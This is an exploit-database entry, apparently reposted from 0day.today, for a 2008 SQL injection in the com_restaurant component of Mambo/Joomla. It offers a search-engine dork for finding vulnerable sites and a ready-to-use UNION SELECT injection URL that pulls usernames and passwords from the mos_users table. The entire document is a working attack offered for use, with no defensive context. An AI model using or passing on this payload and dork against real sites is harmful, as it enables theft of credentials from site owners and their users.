id: 2582
date: 01/31/2008
title: Mambo Component Restaurant 1.0 Remote SQL Injection Vulnerability
author: S@BUN
cves: 

=================================================================
Mambo Component Restaurant 1.0 Remote SQL Injection Vulnerability
=================================================================



#########################################################################
#
# joomla SQL Injection(com_restaurant)
#
#########################################################################
#
# DorKs 1 : allinurl: "com_restaurant"
#
########################################################################
EXPLOIT :

index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*




#  0day.today [2023-03-23]  #